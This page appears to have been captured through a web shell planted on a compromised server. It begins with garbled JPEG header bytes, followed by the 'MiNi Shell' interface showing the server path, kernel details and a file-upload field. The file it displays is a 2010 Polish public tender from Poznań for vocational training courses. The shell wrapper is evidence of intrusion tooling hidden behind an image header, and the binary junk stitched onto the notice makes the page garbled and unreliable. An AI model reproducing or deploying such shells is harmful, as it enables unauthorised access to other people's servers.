JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101014/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101014/288337-N-2010.html

<p class="kh_header"><b>Poznań: Przeprowadzenie szkoleń zawodowych w zakresie realizacji projektu Potwierdź swoje kwalifikacje zawodowe, Działanie 9.3 Upowszechnianie formalnego kształcenia ustawicznego</b><br>
<b>Numer ogłoszenia: 288337 - 2010; data zamieszczenia: 14.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poznańskie Centrum Edukacji Ustawicznej i Praktycznej , ul. Jawornicka 1, 60-161 Poznań, woj. wielkopolskie, tel. 061 6606600, faks 061 6606601.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń zawodowych w zakresie realizacji projektu Potwierdź swoje kwalifikacje zawodowe, Działanie 9.3 Upowszechnianie formalnego kształcenia ustawicznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1	Przedmiotem zamówienia jest wykonanie zadania pod nazwą: Przeprowadzenie szkoleń zawodowych w zakresie realizacji projektu Potwierdź swoje kwalifikacje zawodowe, Działanie 9.3 Upowszechnianie formalnego kształcenia ustawicznego
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV):
	NAZWA	Słownictwo główne
Przedmiot główny	usługi szkolenia zawodowego	80530000-8
2	Szkolenia prowadzone będą w oparciu o załączone programy szkoleń uzupełniających wiadomości i umiejętności pracowników przygotowujących się do egzaminu czeladniczego i mistrzowskiego w zawodach: lakiernik samochodowy, blacharz samochodowy, mechanik pojazdów samochodowych, elektromechanik pojazdów samochodowych i ślusarz.
3	Zamawiający przekazuje wykonawcy wraz z załączonymi programami szkoleń, opracowane i wydrukowane pakiety edukacyjne (150 szt.) stanowiące materiał dydaktyczny dla uczestników szkoleń - przygotowane zgodnie z programem szkoleń.
4	Celem szkolenia jest uzupełnienie luk kompetencyjnych, które wyodrębnione zostały poprzez pomiar sprawdzający oparty na testach dostosowanych do wymagań zapisanych w standardach egzaminacyjnych  Związku Rzemiosła Polskiego.
5	Szkolenia powinny trwać minimum 60 godzin. Z programów szkoleń wynika podział ich na dwie części: zawodową - uzupełniającą wiedzę teoretyczną i umiejętności praktyczne z danego zawodu oraz część dotyczącą przedsiębiorczości, rynku pracy, prawa pracy i w przypadku kandydatów do egzaminu mistrzowskiego - pedagogiki z podstawami  psychologii. Każda z części szkolenia będzie trwać 30 godzin. Szkolenia powinny być prowadzone w grupach ok. 20 osobowych, dopuszcza się możliwość tworzenia grup z różnych zawodów jeżeli treści programu w tej części szkolenia są dla tych zawodów takie same. Nie jest natomiast wskazane tworzenie grup złożonych z kandydatów do złożenia egzaminu mistrzowskiego i czeladniczego.
6	Program szkolenia powinien być realizowany metodami aktywizującymi, tzn. podczas realizacji szkolenia powinna być dokonywana bieżąca ocena osiągnięć edukacyjnych uczestników szkolenia, 80% zajęć musi być prowadzone w formie ćwiczeń. Umiejętności należy oceniać na podstawie obserwacji uczestników podczas wykonywania zadań (ćwiczenia), ich wypowiedzi ustnych oraz sprawdzianów pisemnych. Uczestnik szkolenia powinien być informowany na bieżąco o popełnianych błędach, aby w porę mógł podjąć odpowiednie działania. Podczas kontroli i oceny osiągnięć uczestników należy zwrócić szczególną uwagę na prawidłowe ocenianie zagrożeń występujący na stanowisku pracy, analizowanie zagrożeń dla środowiska naturalnego (np. w zawodzie lakiernik samochodowy) oraz prawidłowy dobór wyposażenia stanowisk pracy. 
7	Szkolenia powinny zostać dostosowane do trzyzmianowego systemu pracy uczestników zajęć z zawodów: blacharz samochodowy, lakiernik samochodowy, mechanik pojazdów samochodowych.
Zajęcia mogą odbywać się w godzinach popołudniowych po godz. 15.00 w tygodniu oraz w weekendy - przed przystąpieniem do ich realizacji należy uzgodnić harmonogram zajęć z uczestnikami.
Zajęcia dla zawodu elektromechanik pojazdów samochodowych i ślusarz mogą odbywać się wyłącznie w weekendy.
8	Uczestnikom zajęć należy zapewnić:
1)	notatniki, długopisy,
2)	zwrot kosztów dojazdu z miejsca pracy lub zamieszkania na szkolenie i z powrotem,
3)	wyżywienie w trakcie zajęć: 1 ciepły posiłek i przerwa kawowa
9	Szkolenia należy przeprowadzić dla 150 uczestników z uwzględnieniem poniższego podziału na zawody i kwalifikacje:
Blacharz samochodowy	czeladnik	11
 	mistrz	37
Lakiernik samochodowy	czeladnik	9
 	mistrz	46
Elektromechanik pojazdów samochodowych	czeladnik	1
 	mistrz	11
Mechanik pojazdów samochodowych	czeladnik	4
 	mistrz	11
Ślusarz 	czeladnik	6
 	mistrz	14
		150
10	Zamawiający przekaże wykonawcy dane kontaktowe i adresowe uczestników zajęć.
11	Wymagania odnośnie sal szkoleniowych:
1)	sale szkoleniowe muszą znajdować się na terenie Miasta Poznania,
2)	położenie sal szkoleniowych musi umożliwiać dojazd uczestników na szkolenia środkami komunikacji miejskiej z dworca głównego PKP i PKS, a dla uczestników szkoleń dojeżdżających własnym środkiem transportu musi zostać udostępniony darmowy parking,
3)	sale szkoleniowe w których prowadzone będą zajęcia muszą zostać oznakowane zgodnie z Wytycznymi Ministerstwa Rozwoju Regionalnego dotyczącymi oznaczania projektów w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI, z dnia 4 lutego 2009 r. dostępnymi na stronie internetowej Wojewódzkiego Urzędu Pracy w Poznaniu pod adresem: www.efs.wup.poznan.pl 
4)	w trakcie zajęć prowadzący zajęcia wykładowca musi mieć zapewniony dostęp do kserokopiarki i urządzeń multimedialnych dających możliwość wyświetlania prezentacji,
5)	sale szkoleniowe muszą spełniać standardy wyposażenia dydaktycznego pracowni kształcenia zawodowego dla zawodów z trzyletnim cyklem kształcenia dla zawodów blacharz samochodowy, mechanik pojazdów samochodowych, elektromechanik pojazdów samochodowych i ślusarz oraz standardy wyposażenia dydaktycznego pracowni kształcenia zawodowego dla zawodów z dwuletnim cyklem kształcenia dla zawodu lakiernik opracowanym przez Krajowy Ośrodek Wspierania Edukacji Zawodowej i Ustawicznej w zakresie niezbędnym do przeprowadzenia szkolenia zgodnie z załączonymi programami szkoleń.
12	Wykonawca szkolenia prowadzi pełną dokumentację kursów, którą po zakończeniu szkoleń przekazuje zamawiającemu, tj.:
1)	listy obecności uczestników zajęć,
2)	dzienniki zajęć w których odnotowywane będą obecności na zajęciach oraz bieżąca ocena osiągnięć edukacyjnych uczestników szkolenia, np. sprawdziany pisemne,
13	Wykonawca przekaże Zamawiającemu dokumentację potwierdzającą kwalifikacje i doświadczenie osób mających prowadzić szkolenia, wskazanych w ofercie, tj. dyplom ukończenia szkoły wyższej oraz zaświadczenie potwierdzające stopień awansu zawodowego nauczyciela mianowanego zgodnego z wykształceniem zawodowym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wysokość wadium.
Wykonawca zobowiązany jest wnieść wadium w wysokości 6000,00 zł (słownie: sześć_tysięcy_złotych).
2.	Forma wadium.
Wadium może być wniesione w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, gwarancjach z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. t.j. z 2007r. Nr 42, poz. 275 ze zm.).
3.	Miejsce i sposób i termin wniesienia wadium.
4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego 96 1050 1520 1000 0023 5031 6374 na przelewie należy umieścić informację Wadium - Przeprowadzenie szkoleń zawodowych w zakresie realizacji projektu Potwierdź swoje kwalifikacje zawodowe, Działanie 9.3 Upowszechnianie formalnego kształcenia ustawicznego.
1)	wadium w pozostałych akceptowanych formach należy składać w oryginale w siedzibie Zamawiającego - POZNAŃSKIE CENTRUM EDUKACJI USTAWICZNEJ I PRAKTYCZNEJ ul. Jawornicka 1, 60-161 Poznań, pok. sekretariat, w terminie do dnia 22 października 2010r. do godziny 11:30.
2)	do oferty należy dołączyć kserokopię wnoszonego wadium. 
3)	wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu, Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał wadium przed upływem terminu składania ofert.
5.	Zwrot wadium.
1)	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 7 ppkt. 2 SIWZ.
2)	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie niniejszego zamówienia oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli było wymagane;
3)	Zamawiający zwróci niezwłocznie wadium wykonawcy, który wycofał ofertę przed upływem terminu składania ofert;
6.	Ponowne wniesienie wadium
Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt 5) ppkt. 1), jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
7.	Zatrzymanie wadium.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli: 
1)	Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
2)	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przeprowadził szkolenie dla 150 uczestników w wyniku zawarcia umowy z jednym z jednym odbiorcą (zamawiającym),</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje 13 osobową kadrą zgodnie z poniższą specyfikacją:
a)	min. 4 czynnych zawodowo nauczycieli, legitymujących się wykształceniem wyższym ekonomicznym z min. 7 letnim doświadczeniem w kształceniu zawodowym związanym z egzaminami zawodowymi,
b)	min. 2 czynnych zawodowo nauczycieli kształcących w zawodzie blacharz samochodowy, legitymujących się wykształceniem wyższym kierunkowym z min. 7 letnim doświadczeniem w kształceniu zawodowym związanym z egzaminami zawodowymi,
c)	min. 2 czynnych zawodowo nauczycieli kształcących w zawodzie lakiernik samochodowy lub lakiernik, legitymujących się wykształceniem wyższym kierunkowym z min. 7 letnim doświadczeniem w kształceniu zawodowym związanym z egzaminami zawodowymi,
d)	min. 1 czynnym zawodowo nauczycielem kształcącego w zawodzie elektromechanik pojazdów samochodowych, legitymującym się wykształceniem wyższym kierunkowym z min. 7 letnim doświadczeniem w kształceniu zawodowym związanym z egzaminami zawodowymi,
e)	min. 2 czynnych zawodowo nauczycieli kształcących w zawodzie mechanik pojazdów samochodowych, legitymujących się wykształceniem wyższym kierunkowym z min. 7 letnim doświadczeniem w kształceniu zawodowym związanym z egzaminami zawodowymi,
f)	min. 2 czynnych zawodowo nauczycieli kształcących w zawodzie ślusarz, legitymujących się wykształceniem wyższym kierunkowym z min. 7 letnim doświadczeniem w kształceniu zawodowym związanym z egzaminami zawodowymi.
4)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)	obniżenie wynagrodzenia, gdy zmiana zostanie spowodowana zmniejszeniem zakresu wykonanych prac i jest korzystna dla Zamawiającego,
2)	termin realizacji -- w przypadku wystąpienia okoliczności niezależnych od Zamawiającego i Wykonawcy, związanych z obecnością kandydatów w szkoleniach,
3)	zmiany w zakresie ilości poszczególnych godzin przewidzianych do szkolenia, jeżeli są konieczne dla dalszej realizacji zamówienia lub są korzystne dla Zamawiającego i nie powodują zwiększenia wynagrodzenia.
4)	zmiany osobowe -- zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami i doświadczeniem.
5)	zmiana umowy w związku z przekształceniem firmy lub wynikające z następstwa prawnego, zgodnie z obowiązującymi przepisami.
6)	nie stanowi zmiany umowy w rozumieniu art. 144 ustawy prawo zamówień publicznych:
a)	zmiana danych związanych z obsługa administracyjno-organizacyjna Umowy (np. zmiana nr rachunku bankowego),
b)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy Stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.city.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poznańskie Centrum Edukacji Ustawicznej i Praktycznej, ul. Jawornicka 1, 61-161Poznań, pok. biuro projektu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2010 godzina 11:30, miejsce: Poznańskie Centrum Edukacji Ustawicznej i Praktycznej, ul. Jawornicka 1, 61-161Poznań, pok. sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego Potwierdź swoje kwalifikacje zawodowe, Działanie 9.3 Upowszechnianie formalnego kształcenia ustawicznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com